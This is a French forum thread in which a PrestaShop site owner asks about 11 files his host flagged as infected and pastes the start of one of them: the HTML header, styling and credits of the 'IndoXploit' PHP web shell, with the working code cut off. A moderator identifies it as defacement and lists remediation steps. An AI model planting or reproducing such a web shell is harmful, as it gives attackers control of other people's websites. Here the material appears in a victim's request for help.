Menu

Attaque "exploit" sur fichiers sur mon serveur [Résolu]

Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
-
Bonjour ...

J'ai un site fait avec prestashop, version 1.6.1.23 ... Il fonctionne bien pas de souci ...

Cependant IONOS ( 1&1 ) arrête pas de m'envoyer des messages pour me dire qu'ils bloquent l'accès à certains fichiers ( droit d'accès sur le FTP ) etc car ces fichiers seraient corrompus ... J'ai analysé les fichiers avec un antivirus sur mon pc ( qui lui même est à priori bien protégé et non infecté ) et rien de malveillant apparemment ...

Il semblerait qu'un code " exploit " etc ait été rajouté à ces fichiers et que le code soit donc malveillant d'après 1&1 ... Il y aurait 11 fichiers infectés dont je met le début du code du 1er ci dessous, que puis je faire svp ? Merci :) ...

<html>
<head>
<title>IndoXploit</title>
<meta name='author' content='IndoXploit'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu%29;
html {
background: #000000;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #ffffff;
border: 1px solid #ffffff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<?php
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & all my friends.
###############################################################################
Afficher la suite 

Votre réponse

2 réponses

Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
19
0
Merci
Je suis victime d'autres "attaques" ... En effet d'autres fichiers m'ont été signalés par 1&1 comme infectés ... Mais pourrait il s'agir simplement de modifications faites de la part de google qui a plus ou moins acces a certains sites grâca à google analytics ou autre par exemple ? MErci :)
Commenter la réponse de TigerDTD
Messages postés
165441
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur
Dernière intervention
21 avril 2019
21987
0
Merci
Salut,

C'est du defacing, voir : https://www.malekal.com/defacement-de-site/
C'est seulement la partie visibles, d'autres groupes ou attaques automatisées ont pu aussi modifier desp ages pour rediriger les internautes vers du contenu malveillants, voler tes bases de données, etc.

donc là faut revenir à une sauvegarde antérieure
  • Vérifier les accès (création de compte non souhaité)
  • changer tous les mots de passe d'accès
  • Vérifier si une backdoor a été implantée
  • Tout mettre à jour (plugins etc) afin de combler des vulnérabilités présentes



TigerDTD
Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
19 -
J'ai supprime les modules et on verra bien si IONOS me dit qu'il y a plus de fichiers infectes
Malekal_morte-
Messages postés
165441
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur
Dernière intervention
21 avril 2019
21987 > TigerDTD
Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
-
Je n'ai rien à ajouter par rapport aux indications précédentes.
TigerDTD
Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
19 -
J'ai supprime le module ou y'avait les fichiers infectes puis reinstaller un autre module et voila :) ...
Merci :)
Malekal_morte-
Messages postés
165441
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur
Dernière intervention
21 avril 2019
21987 > TigerDTD
Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
-
Maintiens tout à jour, sinon tu te feras pirater à nouveau tôt ou tard.
TigerDTD
Messages postés
813
Date d'inscription
lundi 24 août 2009
Statut
Membre
Dernière intervention
17 avril 2019
19 -
Yes ... c’est prévu :-) ... thanks a lot en tout ça cas :-)
Commenter la réponse de Malekal_morte-